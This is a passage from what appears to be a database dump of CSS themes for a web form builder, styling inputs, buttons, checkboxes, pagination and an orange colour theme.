18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #30D1B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(35,'Theme 10 orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F7D3BB;\r\nborder: 1px solid #FAAA63;\r\nmargin-bottom: 10px;\r\ncolor: #FAAA63;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/01/next_hoverbg.png) url([SITE_ROOT]/images/01/01/previous_hover.png) url([SITE_ROOT]/images/01/01/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #000;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/01/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\n	background: #f58b33; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f58b33), color-stop(20%, #faaa63), color-stop(80%, #faaa63), color-stop(100%, #f58b33)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #8D5D35;\r\n	border: 1px solid #F0C579;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #EC8E37;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F7D3BB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 2px solid #FFB471;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #e8a467; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #e8a467), color-stop(20%, #ffb471), color-stop(80%, #ffb471), color-stop(100%, #ffcd72)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 10px 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: 